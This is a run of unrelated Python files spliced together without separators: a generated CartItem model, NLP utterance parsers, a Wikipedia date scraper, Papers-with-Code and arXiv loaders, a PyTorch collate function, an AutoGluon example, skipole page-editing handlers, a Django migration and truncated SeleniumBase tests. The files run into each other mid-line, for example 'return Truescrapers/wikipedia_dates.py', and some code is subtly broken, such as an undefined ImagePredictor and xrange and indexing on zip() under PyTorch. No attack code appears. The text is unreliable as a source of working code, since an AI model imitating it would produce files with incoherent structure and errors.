this CartItem. :type: int """ self._item_oid = item_oid @property def kit(self): """ Gets the kit of this CartItem. True if this item is a kit :return: The kit of this CartItem. :rtype: bool """ return self._kit @kit.setter def kit(self, kit): """ Sets the kit of this CartItem. True if this item is a kit :param kit: The kit of this CartItem. :type: bool """ self._kit = kit @property def kit_component_options(self): """ Gets the kit_component_options of this CartItem. Options associated with the kit components :return: The kit_component_options of this CartItem. 
:rtype: list[CartKitComponentOption] """ return self._kit_component_options @kit_component_options.setter def kit_component_options(self, kit_component_options): """ Sets the kit_component_options of this CartItem. Options associated with the kit components :param kit_component_options: The kit_component_options of this CartItem. :type: list[CartKitComponentOption] """ self._kit_component_options = kit_component_options @property def manufacturer_suggested_retail_price(self): """ Gets the manufacturer_suggested_retail_price of this CartItem. :return: The manufacturer_suggested_retail_price of this CartItem. :rtype: Currency """ return self._manufacturer_suggested_retail_price @manufacturer_suggested_retail_price.setter def manufacturer_suggested_retail_price(self, manufacturer_suggested_retail_price): """ Sets the manufacturer_suggested_retail_price of this CartItem. :param manufacturer_suggested_retail_price: The manufacturer_suggested_retail_price of this CartItem. :type: Currency """ self._manufacturer_suggested_retail_price = manufacturer_suggested_retail_price @property def maximum_quantity(self): """ Gets the maximum_quantity of this CartItem. Maximum quantity the customer can purchase :return: The maximum_quantity of this CartItem. :rtype: float """ return self._maximum_quantity @maximum_quantity.setter def maximum_quantity(self, maximum_quantity): """ Sets the maximum_quantity of this CartItem. Maximum quantity the customer can purchase :param maximum_quantity: The maximum_quantity of this CartItem. :type: float """ self._maximum_quantity = maximum_quantity @property def minimum_quantity(self): """ Gets the minimum_quantity of this CartItem. Minimum quantity the customer can purchase :return: The minimum_quantity of this CartItem. :rtype: float """ return self._minimum_quantity @minimum_quantity.setter def minimum_quantity(self, minimum_quantity): """ Sets the minimum_quantity of this CartItem. Minimum quantity the customer can purchase :param minimum_quantity: The minimum_quantity of this CartItem. :type: float """ self._minimum_quantity = minimum_quantity @property def multimedia(self): """ Gets the multimedia of this CartItem. Multimedia :return: The multimedia of this CartItem. :rtype: list[CartItemMultimedia] """ return self._multimedia @multimedia.setter def multimedia(self, multimedia): """ Sets the multimedia of this CartItem. Multimedia :param multimedia: The multimedia of this CartItem. :type: list[CartItemMultimedia] """ self._multimedia = multimedia @property def options(self): """ Gets the options of this CartItem. Options :return: The options of this CartItem. :rtype: list[CartItemOption] """ return self._options @options.setter def options(self, options): """ Sets the options of this CartItem. Options :param options: The options of this CartItem. :type: list[CartItemOption] """ self._options = options @property def phsyical(self): """ Gets the phsyical of this CartItem. :return: The phsyical of this CartItem. :rtype: CartItemPhysical """ return self._phsyical @phsyical.setter def phsyical(self, phsyical): """ Sets the phsyical of this CartItem. :param phsyical: The phsyical of this CartItem. :type: CartItemPhysical """ self._phsyical = phsyical @property def position(self): """ Gets the position of this CartItem. Position of the item in the cart :return: The position of this CartItem. :rtype: int """ return self._position @position.setter def position(self, position): """ Sets the position of this CartItem. 
Position of the item in the cart :param position: The position of this CartItem. :type: int """ self._position = position @property def preorder(self): """ Gets the preorder of this CartItem. True if this item is on pre-order :return: The preorder of this CartItem. :rtype: bool """ return self._preorder @preorder.setter def preorder(self, preorder): """ Sets the preorder of this CartItem. True if this item is on pre-order :param preorder: The preorder of this CartItem. :type: bool """ self._preorder = preorder @property def quantity(self): """ Gets the quantity of this CartItem. quantity :return: The quantity of this CartItem. :rtype: float """ return self._quantity @quantity.setter def quantity(self, quantity): """ Sets the quantity of this CartItem. quantity :param quantity: The quantity of this CartItem. :type: float """ self._quantity = quantity @property def schedules(self): """ Gets the schedules of this CartItem. Customer selectable auto order schedules :return: The schedules of this CartItem. :rtype: list[str] """ return self._schedules @schedules.setter def schedules(self, schedules): """ Sets the schedules of this CartItem. Customer selectable auto order schedules :param schedules: The schedules of this CartItem. :type: list[str] """ self._schedules = schedules @property def total_cost(self): """ Gets the total_cost of this CartItem. :return: The total_cost of this CartItem. :rtype: Currency """ return self._total_cost @total_cost.setter def total_cost(self, total_cost): """ Sets the total_cost of this CartItem. :param total_cost: The total_cost of this CartItem. :type: Currency """ self._total_cost = total_cost @property def total_cost_with_discount(self): """ Gets the total_cost_with_discount of this CartItem. :return: The total_cost_with_discount of this CartItem. :rtype: Currency """ return self._total_cost_with_discount @total_cost_with_discount.setter def total_cost_with_discount(self, total_cost_with_discount): """ Sets the total_cost_with_discount of this CartItem. :param total_cost_with_discount: The total_cost_with_discount of this CartItem. :type: Currency """ self._total_cost_with_discount = total_cost_with_discount @property def unit_cost(self): """ Gets the unit_cost of this CartItem. :return: The unit_cost of this CartItem. :rtype: Currency """ return self._unit_cost @unit_cost.setter def unit_cost(self, unit_cost): """ Sets the unit_cost of this CartItem. :param unit_cost: The unit_cost of this CartItem. :type: Currency """ self._unit_cost = unit_cost @property def unit_cost_with_discount(self): """ Gets the unit_cost_with_discount of this CartItem. :return: The unit_cost_with_discount of this CartItem. :rtype: Currency """ return self._unit_cost_with_discount @unit_cost_with_discount.setter def unit_cost_with_discount(self, unit_cost_with_discount): """ Sets the unit_cost_with_discount of this CartItem. :param unit_cost_with_discount: The unit_cost_with_discount of this CartItem. :type: Currency """ self._unit_cost_with_discount = unit_cost_with_discount @property def upsell(self): """ Gets the upsell of this CartItem. True if this item was added to the cart as part of an upsell :return: The upsell of this CartItem. :rtype: bool """ return self._upsell @upsell.setter def upsell(self, upsell): """ Sets the upsell of this CartItem. True if this item was added to the cart as part of an upsell :param upsell: The upsell of this CartItem. :type: bool """ self._upsell = upsell @property def variations(self): """ Gets the variations of this CartItem. 
Variations :return: The variations of this CartItem. :rtype: list[CartItemVariationSelection] """ return self._variations @variations.setter def variations(self, variations): """ Sets the variations of this CartItem. Variations :param variations: The variations of this CartItem. :type: list[CartItemVariationSelection] """ self._variations = variations @property def view_url(self): """ Gets the view_url of this CartItem. URL to view the product on the site :return: The view_url of this CartItem. :rtype: str """ return self._view_url @view_url.setter def view_url(self, view_url): """ Sets the view_url of this CartItem. URL to view the product on the site :param view_url: The view_url of this CartItem. :type: str """ self._view_url = view_url def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, CartItem): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other import datetime import functools import re from typing import Callable, Iterable, Tuple, Union, cast import dateparser import gamla import inflect import number_parser import phonenumbers import pyap import spacy import agenda _nlp = spacy.load("en_core_web_lg") @functools.cache def _cached_inflect_engine(): return inflect.engine() def _remove_punctuation(text: str) -> str: return re.sub(r"[.,!?;]", "", text) def _analyze(text: str): return _nlp(text) _AFFIRMATIVE = { "affirmative", "agree", "cool", "definitely", "good", "i did", "i do", "i had", "i have", "i think so", "i believe so", "obviously", "of course", "ok", "proceed", "right", "sure", "that's great", "yeah", "yes", "yup", } _NEGATIVE = { "definitely not", "didn't", "don't", "have not", "i don't think so", "i have not", "i haven't", "nah", "negative", "negatory", "no", "nope", "not", "nothing", "of course not", "i disagree", "disagree", } @functools.cache def _singular_noun(word: str) -> str: return _cached_inflect_engine().singular_noun(word) or word @functools.cache def _plural_noun(word: str) -> str: if _cached_inflect_engine().singular_noun(word): return word return _cached_inflect_engine().plural_noun(word, count=None) _singularize_or_pluralize_words: Callable[ [Iterable[str]], Tuple[str, ...] 
] = gamla.compose_left( gamla.juxtcat( gamla.compose_left(gamla.map(_singular_noun), frozenset), gamla.compose_left(gamla.map(_plural_noun), frozenset), ), tuple, ) def _sentences_similarity(user_utterance: str, examples: Tuple[str, ...]) -> float: user_sentence = _analyze(user_utterance) return gamla.pipe( examples, gamla.map( gamla.compose_left( _analyze, lambda sentence: sentence.similarity(user_sentence) ) ), gamla.sort, gamla.last, ) _text_to_lower_case_words: Callable[[str], Iterable[str]] = gamla.compose_left( lambda text: re.findall(r"[\w']+|[.,!?;]", text.lower()) ) _text_to_ngram_text: Callable[[str], Tuple[str]] = gamla.compose_left( _text_to_lower_case_words, gamla.get_all_n_grams, gamla.map(" ".join), tuple ) def faq_score(question: str, user_utternace: str) -> float: return gamla.pipe( user_utternace, _analyze, lambda sentence: sentence.similarity(_analyze(question)), ) email: Callable[[str], str] = gamla.compose_left( _analyze, gamla.filter(gamla.attrgetter("like_email")), gamla.map(gamla.attrgetter("text")), tuple, gamla.ternary(gamla.nonempty, gamla.head, gamla.just(agenda.UNKNOWN)), ) phone: Callable[[str], str] = gamla.compose_left( lambda text: phonenumbers.PhoneNumberMatcher( text, "US", leniency=phonenumbers.Leniency.POSSIBLE ), gamla.map( lambda match: phonenumbers.format_number( match.number, phonenumbers.PhoneNumberFormat.NATIONAL ) ), tuple, gamla.ternary(gamla.identity, gamla.head, gamla.just(agenda.UNKNOWN)), ) person_name: Callable[[str], str] = gamla.compose_left( _remove_punctuation, _analyze, gamla.filter( gamla.compose_left(gamla.attrgetter("ent_type_"), gamla.equals("PERSON")) ), gamla.map(gamla.attrgetter("text")), " ".join, gamla.when(gamla.equals(""), gamla.just(agenda.UNKNOWN)), ) person_name_less_strict: Callable[[str], str] = gamla.compose_left( _remove_punctuation, _analyze, gamla.filter(gamla.compose_left(gamla.attrgetter("pos_"), gamla.equals("PROPN"))), gamla.map(gamla.attrgetter("text")), " ".join, gamla.when(gamla.equals(""), gamla.just(agenda.UNKNOWN)), ) address: Callable[[str], str] = gamla.compose_left( lambda user_utterance: pyap.parse(user_utterance, country="US"), gamla.ternary( gamla.nonempty, gamla.compose_left(gamla.head, gamla.attrgetter("full_address")), gamla.just(agenda.UNKNOWN), ), ) def intent(examples: Tuple[str, ...]) -> Callable[[str], bool]: def parse_bool(user_utterance: str): return bool(examples) and _sentences_similarity(user_utterance, examples) >= 0.9 return parse_bool def yes_no(user_utterance: str): if gamla.pipe( user_utterance, _text_to_lower_case_words, gamla.anymap(gamla.contains(_AFFIRMATIVE)), ): return True if gamla.pipe( user_utterance, _text_to_lower_case_words, gamla.anymap(gamla.contains(_NEGATIVE)), ): return False return agenda.UNKNOWN def multiple_choices( options: Tuple[str, ...] 
) -> Callable[[str], Tuple[str, agenda.Unknown]]: return gamla.compose_left( _text_to_ngram_text, gamla.filter( gamla.contains([*_singularize_or_pluralize_words(options), "none"]) ), tuple, gamla.when(gamla.empty, gamla.just(agenda.UNKNOWN)), gamla.when( gamla.alljuxt( gamla.is_instance(tuple), gamla.len_equals(1), gamla.compose_left(gamla.head, gamla.equals("none")), ), gamla.just(()), ), ) _single_timeslot_or_unknown = gamla.ternary( gamla.len_equals(1), gamla.compose_left(gamla.head, gamla.apply_method("isoformat")), gamla.just(agenda.UNKNOWN), ) def datetime_choice(options, relative_to): def extract_datetime_choice(user_utterance: str) -> Union[str, agenda.Unknown]: d = future_date(relative_to, user_utterance) t = time(relative_to, user_utterance) if agenda.UNKNOWN not in (d, t): choice = datetime.datetime.combine( cast(datetime.date, d), cast(datetime.time, t) ) return choice.isoformat() if choice in options else agenda.UNKNOWN if d is not agenda.UNKNOWN: return gamla.pipe( options, gamla.filter(lambda o: o.date() == cast(datetime.date, d)), tuple, _single_timeslot_or_unknown, ) if t is not agenda.UNKNOWN: return gamla.pipe( options, gamla.filter(lambda o: o.time().hour == cast(datetime.time, t).hour), tuple, _single_timeslot_or_unknown, ) return agenda.UNKNOWN return extract_datetime_choice def single_choice(options: Tuple[str, ...]) -> Callable[[str], str]: return gamla.compose_left( _text_to_ngram_text, gamla.filter(gamla.contains(_singularize_or_pluralize_words(options))), tuple, gamla.ternary(gamla.len_equals(1), gamla.head, gamla.just(agenda.UNKNOWN)), ) amount = gamla.compose_left( _remove_punctuation, _text_to_lower_case_words, gamla.map(number_parser.parse_number), gamla.remove(gamla.equals(None)), tuple, gamla.ternary(gamla.nonempty, gamla.head, gamla.just(agenda.UNKNOWN)), ) def amount_of(noun: str): analyzed_noun = _analyze(noun) def amount_of(user_utterance): return gamla.pipe( user_utterance, _remove_punctuation, number_parser.parse, _analyze, gamla.filter(lambda t: t.similarity(analyzed_noun) > 0.5), gamla.mapcat(gamla.attrgetter("children")), gamla.filter( gamla.compose_left(gamla.attrgetter("dep_"), gamla.equals("nummod")) ), gamla.map(gamla.attrgetter("text")), tuple, gamla.ternary( gamla.len_greater(0), gamla.compose_left(gamla.head, number_parser.parse_number), gamla.just(agenda.UNKNOWN), ), ) return amount_of def _parse_datetime(relative_to): def parse_datetime(date_str): return dateparser.parse( date_str, settings={ "RELATIVE_BASE": relative_to, "PREFER_DATES_FROM": "future", "TIMEZONE": "UTC", }, ) return parse_datetime def _entities_of_type(date): return gamla.compose_left( _analyze, gamla.attrgetter("ents"), gamla.filter( gamla.compose_left(gamla.attrgetter("label_"), gamla.equals(date)) ), ) def future_date( relative_to: datetime.datetime, user_utterance ) -> Union[datetime.date, agenda.Unknown]: return gamla.pipe( user_utterance, _entities_of_type("DATE"), gamla.map( gamla.compose_left(gamla.attrgetter("text"), _parse_datetime(relative_to)) ), gamla.filter(gamla.identity), gamla.excepts( StopIteration, gamla.just(agenda.UNKNOWN), gamla.compose_left(gamla.head, gamla.apply_method("date")), ), ) def time( relative_to: datetime.datetime, user_utterance ) -> Union[datetime.time, agenda.Unknown]: return gamla.pipe( user_utterance, _entities_of_type("TIME"), gamla.map( gamla.compose_left(gamla.attrgetter("text"), _parse_datetime(relative_to)) ), gamla.filter(gamla.identity), gamla.excepts( StopIteration, gamla.just(agenda.UNKNOWN), gamla.compose_left(gamla.head, 
gamla.apply_method("time")), ), ) def checkio(matrix): for i in range(len(matrix)): for j in range(len(matrix)): if matrix[i][j]!=-matrix[j][i]: return False return Truescrapers/wikipedia_dates.py import calendar import re import time import sqlite3 import requests from bs4 import BeautifulSoup from tqdm import tqdm def generate_days(year=2020): month_length = [] months = list(calendar.month_name)[1:] for i, month in enumerate(months): days = calendar.monthrange(year, i+1)[1] month_length.append((month, days)) month_and_days = [] for month, days in month_length: for day in range(1, days + 1): month_and_days.append((month, str(day))) strings = ['_'.join(mad) for mad in month_and_days] return strings def scrape_date(date): day, month = date.split('_') html = requests.get(f'http://en.wikipedia.org/wiki/{date}').text m = re.search(r'Events.*?Births', html, re.DOTALL) s = m.start() e = m.end() - len('Births') soup = BeautifulSoup(html[s:e]) li = soup.find_all('li') events = [f'{day} {month}, {l.text}' for l in li] return events def scrape_all(): days = generate_days(2020) events = [] for date in tqdm(days): e = scrape_date(date) events.extend(e) time.sleep(0.5) return events if __name__ == '__main__': events = scrape_all() # transform x = events.copy() x = [xi.split(' – ', 1) for xi in x] x = [xi for xi in x if len(xi) == 2] items = [(xi[0].strip(), xi[1].strip()) for xi in x] # load con = sqlite3.connect('data/categories.db') c = con.cursor() c.execute('CREATE TABLE dates (prompt TEXT, answer TEXT, flag INT)') c.executemany('INSERT INTO dates VALUES (?,?,0)', items) con.commit() con.close() # Data getters import datetime import gzip import json import logging import os import numpy as np import pandas as pd from ai_papers_with_code import PROJECT_DIR DATA_PATH = f"{PROJECT_DIR}/inputs/data" # Papers with code scripts def make_year(x): """Extracts year from a datetime.datetime object""" return x.year if pd.isnull(x) is False else np.nan def read_parse(file_name): """Reads, decompresses and parses a pwc file""" with gzip.open(f"{DATA_PATH}/{file_name}", "rb") as f: file_content = f.read() return json.loads(file_content) def parse_date_string(x, _format="%Y-%m-%d"): return ( datetime.datetime.strptime(x, "%Y-%m-%d") if pd.isnull(x) is False else np.nan ) def make_month_year(x): return datetime.datetime(x.year, x.month, 1) if pd.isnull(x) is False else np.nan def make_empty_list_na(df, variables): """Remove empty lists with np.nans in a dataframe""" df_ = df.copy() for v in variables: df_[v] = df[v].apply(lambda x: x if len(x) > 0 else np.nan) return df_ def get_pwc_papers(): """Get papers table""" # Read and parse the data paper_json = read_parse("papers-with-abstracts.json.gz") # Fix missing values paper_df = pd.DataFrame(paper_json) paper_df_clean = make_empty_list_na(paper_df, ["tasks", "methods"]).replace( {None: np.nan, "": np.nan} ) paper_df_clean["date"] = paper_df_clean["date"].apply( lambda x: parse_date_string(x) ) paper_df_clean["month_year"] = paper_df_clean["date"].apply( lambda x: make_month_year(x) ) paper_df_clean["year"] = paper_df_clean["date"].apply(lambda x: make_year(x)) return paper_df_clean def get_pwc_code_lookup(): """Get papers to code lookup""" paper_code_table = read_parse("links-between-papers-and-code.json.gz") pc_df = pd.DataFrame(paper_code_table).replace({None: np.nan}) return pc_df def get_pwc_methods(): """Get methods""" method_json = read_parse("methods.json.gz") method_df = pd.DataFrame(method_json).replace({None: np.nan}) return method_df def get_pwc_data(): 
"""Get data""" data_json = read_parse("datasets.json.gz") data_df = pd.DataFrame(data_json) data_df_clean = make_empty_list_na( data_df, ["languages", "tasks", "modalities", "data_loaders"] ).replace({None: np.nan}) data_df_clean["date"] = data_df_clean["introduced_date"].apply( lambda x: parse_date_string(x) ) data_df_clean["month_year"] = data_df_clean["date"].apply( lambda x: make_month_year(x) ) data_df_clean["year"] = data_df_clean["date"].apply(lambda x: make_year(x)) return data_df_clean # arXiv scripts def add_author(art_data, art, org="deepmind"): """Adds a new institutional author to an article list of contributing institutes""" if org == "deepmind": values = [ art, "extra_deepmind", np.nan, np.nan, "extra_deepmind", "DeepMind", np.nan, np.nan, "London", "United Kingdom", "GB", "Company", "UKI", "UKI3", "UKI32", ] else: values = [ art, "extra_openai", np.nan, np.nan, "extra_openai", "OpenAI", np.nan, np.nan, "San Francisco", "USA", "US", "Not-profit", np.nan, np.nan, np.nan, ] return art_data.append(pd.Series(values, index=art_data.columns), ignore_index=True) def make_institute_article_table(): """Processes the institute data to incorporate deepmind and openai""" institute = pd.read_csv( f"{PROJECT_DIR}/inputs/data/arxiv_institutes.csv", dtype={"article_id": str} ) # We want one article x institution institute["name"] = institute["name"].apply(lambda x: x.split(" (")[0].strip()) institute_deduped = institute.drop_duplicates(["article_id", "name"]) with open(f"{PROJECT_DIR}/inputs/data/scraped_arxiv_ids.json", "r") as infile: arxiv_ids = json.load(infile) dm_papers = set( [key.split("/")[-1] for key, value in arxiv_ids.items() if value == "DeepMind"] ) oai_papers = set( [key.split("/")[-1] for key, value in arxiv_ids.items() if value == "OpenAI"] ) logging.info("Updating deepmind") institute_dm = institute_deduped.loc[ institute_deduped["article_id"].isin(dm_papers) ] revised_rows = [] # We loop over articles. 
If there is a google author we replace it with deepmind, otherwise we add deepmind for _id in set(institute_dm["article_id"]): art_data = institute_dm.query(f"article_id == '{_id}'") if "Google" in list(art_data["name"]): art_data_ = art_data.query("name!='Google'") revised_rows.append(add_author(art_data, _id, "deepmind")) else: revised_rows.append(add_author(art_data, _id, "deepmind")) institute_dm_revised = pd.concat(revised_rows) institute_dm_update = pd.concat( [ institute_deduped.loc[~institute_deduped["article_id"].isin(dm_papers)], institute_dm_revised, ] ).reset_index(drop=True) revised_rows = [] logging.info("Updating OpenAI") institute_oai = institute_dm_update.loc[ institute_dm_update["article_id"].isin(oai_papers) ] # We loop over articles and add OpenAI as participant institution for _id in set(institute_oai["article_id"]): art_data = institute_oai.query(f"article_id == '{_id}'") revised_rows.append(add_author(art_data, _id, "openai")) institute_oai_revised = pd.concat(revised_rows) institute_final = pd.concat( [ institute_dm_update.loc[ ~institute_dm_update["article_id"].isin(oai_papers) ], institute_oai_revised, ] ).reset_index(drop=True) return institute_final def get_arxiv_papers(): return pd.read_csv( f"{PROJECT_DIR}/inputs/data/arxiv_ai_papers", dtype={"article_id": str} ) def get_arxiv_institutes(processed=True): if processed is True: proc_path = f"{PROJECT_DIR}/inputs/data/arxiv_institute_processed.csv" if os.path.exists(proc_path) is True: return pd.read_csv(proc_path, dtype={"article_id": str}) else: logging.info("Processing and saving article - institutes") art_inst_proc = make_institute_article_table().drop( axis=1, labels=["grid_id"] ) art_inst_proc.to_csv(proc_path, index_label=False) return art_inst_proc else: return pd.read_csv( f"{PROJECT_DIR}/inputs/data/arxiv_institutes.csv", dtype={"article_id": str} ) # -*- coding: utf-8 -*- """ description: Dataset Utils """ import numpy as np import torch from torch.utils.data.dataloader import default_collate def collate_fn(batch): transposed = zip(*batch) # imgs = default_collate(transposed[0]) lbl = default_collate(transposed[1]) images = transposed[0] num_images = len(images) shapes = transposed[3] max_shape = int(np.max(np.max(shapes, axis=0))) imgs = torch.zeros(num_images, 3, max_shape, max_shape) for i in xrange(num_images): img_size = images[i].size() imgs[i, :, 0:img_size[1], 0:img_size[2]] = images[i] boxes = [] box = transposed[2] for i in xrange(len(transposed[2])): boxes += [[i] + b.tolist() for b in box[i]] boxes = np.array(boxes) shapes = default_collate(transposed[3]) return imgs, lbl, boxes, shapes def test_collate_fn(batch): transposed = zip(*batch) # imgs = default_collate(transposed[0]) images = transposed[0] num_images = len(images) shapes = transposed[2] max_shape = int(np.max(np.max(shapes, axis=0))) imgs = torch.zeros(num_images, 3, max_shape, max_shape) for i in xrange(num_images): img_size = images[i].size() imgs[i, :, 0:img_size[1], 0:img_size[2]] = images[i] boxes = [] box = transposed[1] for i in xrange(len(box)): boxes += [[i] + b.tolist() for b in box[i]] boxes = np.array(boxes) shapes = default_collate(shapes) return imgs, boxes, shapes examples/nas/search_efficientnet.py1-10 import math import autogluon.core as ag from autogluon.mxnet.optimizer import SGD from autogluon.extra.model_zoo import EfficientNet from autogluon.vision import ImagePredictor as task @ag.obj( width_coefficient=ag.Categorical(1.1, 1.2), depth_coefficient=ag.Categorical(1.1, 1.2), ) class 
EfficientNetB1(EfficientNet): def __init__(self, width_coefficient, depth_coefficient): input_factor = math.sqrt(2.0 / (width_coefficient ** 2) / depth_coefficient) input_size = math.ceil((224 * input_factor) / 32) * 32 super().__init__(width_coefficient=width_coefficient, depth_coefficient=depth_coefficient, input_size=input_size) classifier = ImagePredictor() classifier.fit('imagenet', hyperparameters={ 'net':EfficientNetB1(), 'search_strategy': 'grid', 'optimizer': SGD(learning_rate=1e-1, momentum=0.9, wd=1e-4), 'batch_size': 32 }) print(classifier.fit_summary()) "Functions implementing FilePage editing" from ... import ValidateError, FailPage, ServerError from ....ski.project_class_definition import SectionData from ... import skilift from ....skilift import editpage from .. import utils def retrieve_edit_filepage(skicall): "Retrieves widget data for the edit file page" call_data = skicall.call_data pd = call_data['pagedata'] # clears any session data, keeping page_number, pchange and any status message utils.clear_call_data(call_data, keep=["page_number", "pchange", "status"]) project = call_data['editedprojname'] if 'page_number' in call_data: pagenumber = call_data['page_number'] str_pagenumber = str(pagenumber) else: raise FailPage(message = "page missing") if not pagenumber: raise FailPage(message = "Invalid page") try: pageinfo = skilift.page_info(project, pagenumber) if pageinfo.item_type != 'FilePage': raise FailPage(message = "Invalid page") call_data['pchange'] = pageinfo.change filepath, mimetype = editpage.file_parameters(project, pagenumber) except ServerError as e: raise FailPage(message = e.message) # fill in sections sd_adminhead = SectionData("adminhead") sd_page_edit = SectionData("page_edit") # fills in the data for editing page name, brief, parent, etc., sd_adminhead["page_head","large_text"] = pageinfo.name sd_page_edit['p_ident','page_ident'] = (project,str_pagenumber) sd_page_edit['p_name','page_ident'] = (project,str_pagenumber) sd_page_edit['p_description','page_ident'] = (project,str_pagenumber) sd_page_edit['p_rename','input_text'] = pageinfo.name sd_page_edit['p_parent','input_text'] = "%s,%s" % (project, pageinfo.parentfolder_number) sd_page_edit['p_brief','input_text'] = pageinfo.brief pd.update(sd_adminhead) pd.update(sd_page_edit) pd['p_file','input_text'] = filepath pd['p_mime','input_text'] = mimetype pd['enable_cache','radio_checked'] = pageinfo.enable_cache def submit_new_filepath(skicall): "Sets new page filepath" call_data = skicall.call_data project = call_data['editedprojname'] if 'page_number' in call_data: pagenumber = call_data['page_number'] else: raise FailPage(message = "page missing") if not pagenumber: raise FailPage(message = "Invalid page") pchange = call_data['pchange'] if not 'filepath' in call_data: raise FailPage(message="No filepath given") new_filepath = call_data['filepath'] if not new_filepath: raise FailPage(message="No filepath given") try: call_data['pchange'] = editpage.page_filepath(project, pagenumber, pchange, new_filepath) except ServerError as e: raise FailPage(message=e.message) call_data['status'] = 'Page filepath set: %s' % (new_filepath,) def submit_mimetype(skicall): "Sets mimetype" call_data = skicall.call_data project = call_data['editedprojname'] if 'page_number' in call_data: pagenumber = call_data['page_number'] else: raise FailPage(message = "page missing") if not pagenumber: raise FailPage(message = "Invalid page") pchange = call_data['pchange'] if not 'mime_type' in call_data: raise FailPage(message="No 
mimetype given") # Set the page mimetype try: call_data['pchange'] = editpage.page_mimetype(project, pagenumber, pchange, call_data['mime_type']) except ServerError as e: raise FailPage(message=e.message) call_data['status'] = 'Mimetype set' def submit_cache(skicall): "Sets cache true or false" call_data = skicall.call_data # this function is duplicated in editpage, may be better to remove this file and transfer conetents to editpage project = call_data['editedprojname'] pagenumber = call_data['page_number'] pchange = call_data['pchange'] if 'cache' not in call_data: raise FailPage(message="No cache instruction given") try: # Set the page cache if call_data['cache'] == 'True': enable_cache = True message = "Cache Enabled" else: enable_cache = False message = "Cache Disabled" call_data['pchange'] = editpage.page_enable_cache(project, pagenumber, pchange, enable_cache) except ServerError as e: raise FailPage(message=e.message) call_data['status'] = message # Generated by Django 2.1 on 2019-08-21 13:03 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='AboutDescription', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=100)), ('description', models.CharField(max_length=1000)), ('image', models.ImageField(upload_to='images/aboutusImage')), ], ), migrations.CreateModel( name='Contact', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=200)), ('email', models.CharField(max_length=50)), ('subject', models.CharField(max_length=100)), ('phone', models.CharField(max_length=50)), ('message', models.TextField(blank=True)), ], ), migrations.CreateModel( name='OurServices', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('serviceName', models.CharField(max_length=50)), ], ), migrations.CreateModel( name='TeamInfo', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('firstName', models.CharField(max_length=50)), ('lastName', models.CharField(max_length=50)), ('designation', models.CharField(max_length=50)), ('profilePic', models.ImageField(upload_to='images/teamProfile')), ('facebookLink', models.CharField(max_length=100)), ('twitterLink', models.CharField(max_length=100)), ('linkedInLink', models.CharField(max_length=100)), ], ), ] import pytest from seleniumbase import BaseCase from qa327_test.conftest import base_url from unittest.mock import patch from qa327.models import db, User, TicketInfo from werkzeug.security import generate_password_hash, check_password_hash """ This file defines unit tests for the frontend homepage. The tests will only test the frontend portion of the program, by patching the backend to return specfic values. For example: @patch('qa327.backend.get_user', return_value=test_user) Will patch the backend get_user function (within the scope of the current test case) so that it return 'test_user' instance below rather than reading the user from the database. 
Annotate @patch before unit tests can mock backend methods (for that testing function) """ # Mock a smple user (login) test_user_login = User( email='', name='LetsTestL', password=generate_password_hash('!'), balance=10000 ) # Moch some sample tickets test_tickets = TicketInfo( email='', name='t1', quantity=1, price=100, date='20210408' ) class TestR5(BaseCase): # Test Case R5.0.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_positive_update(self, *_): """ Checking for positive case for the fields of ticket's update form with lower boundaries """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with low values self.type("#name_update", "t1") self.type("#quantity_update", "1") self.type("#price_update", "10") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert no error text appears self.assert_text_not_visible("Ticket name must be alphanumeric-only", "#message") # TODO update these asserts self.assert_text_not_visible("Ticket name cannot begin with a space", "#message") self.assert_text_not_visible("Ticket name cannot end with a space", "#message") self.assert_text_not_visible("Ticket name cannot be longer than 60 characters", "#message") self.assert_text_not_visible("At least 1 ticket must be sold", "#message") self.assert_text_not_visible("At most 100 tickets can be sold", "#message") self.assert_text_not_visible("Price of the ticket cannot be below 10", "#message") self.assert_text_not_visible("Price of the ticket cannot be above 100", "#message") self.assert_text_not_visible("Expiration date is in invalid format", "#message") # open logout (for cleanup) self.open(base_url + '/logout') # Test Case R5.0.1 @pytest.mark.timeout(60) @patch('qa327.backend.get_user', return_value=test_user_login) @patch('qa327.backend.get_ticket', return_value=test_tickets) def test_positive_update2(self, *_): """ Checking for positive case for the fields of ticket's update form with upper boundaries """ # open logout page to invalid any logged-in sessions that may exist, then open login page self.open(base_url + '/logout') self.open(base_url + '/') # test that redirection to /login has occurred # fill email and password self.type("#email", test_user_login.email) self.type("#password", "!") # click enter button self.click('input[type="submit"]') # enter update ticket form with high values self.type("#name_update", "t1") self.type("#quantity_update", "100") self.type("#price_update", "100") self.type("#expdate_update", "20210901") # click update button self.click('input[value="Update"]') # assert no error text appears self.assert_text_not_visible("Ticket name must be alphanumeric-only", "#message") self.assert_text_not_visible("Ticket name cannot begin with a space", "#message") self.assert_text_not_visible("Ticket name cannot end with a space", "#message") self.assert_text_not_visible("Ticket name cannot be longer than 60 characters", "#message") # TODO update these asserts self.assert_text_not_visible("At most 100 tickets can be sold", "#message") self.assert_text_not_visible("Price of the ticket cannot be below 10", 
